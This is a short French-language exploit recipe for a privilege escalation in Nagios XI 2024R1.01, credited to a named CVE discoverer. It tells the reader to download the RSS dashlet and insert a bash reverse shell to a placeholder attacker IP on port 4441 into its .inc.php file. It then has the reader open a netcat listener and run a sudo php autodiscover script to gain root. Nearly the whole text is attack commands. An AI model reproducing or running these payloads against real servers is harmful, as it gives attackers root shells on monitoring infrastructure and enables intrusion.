
Escalade de privilèges pour Nagios XI 2024R1.01, permettant un accès root complet depuis les utilisateurs NAGIOS ou APACHE via une injection malveillante de dashlet RSS et l'exécution de commandes sudo.
CVE découverte par : K. Wahab (Neo`X)
Le RSS Dashlet est utilisé dans cet exemple.
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
Accédez à la page de gestion des dashlets et téléchargez un Dashlet :
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
Modifiez le fichier *.inc.php :
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");

nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(Remarque : après avoir exécuté la commande, vous recevrez une connexion en tant qu'APACHE, utilisez CTRL+C pour quitter et redémarrez le listener à plusieurs reprises)
